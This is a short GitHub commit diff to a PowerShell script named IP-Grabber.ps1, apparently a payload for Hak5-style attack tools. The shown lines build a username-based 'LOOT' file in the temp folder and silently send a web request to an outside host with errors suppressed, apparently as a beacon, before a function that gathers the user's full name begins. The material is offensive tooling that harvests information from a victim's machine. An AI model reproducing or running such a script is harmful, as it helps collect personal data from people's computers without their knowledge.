Update IP-Grabber.ps1

This commit is contained in:
I-Am-Jakoby
2023-06-10 15:28:49 -05:00
committed by GitHub
parent 1060c313fe
commit 2575e78c54
+1 -1
View File
@@ -1,5 +1,5 @@
$FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt"
iwr "https://jakoby.lol/hak5" -EA 0 >$null
#------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName {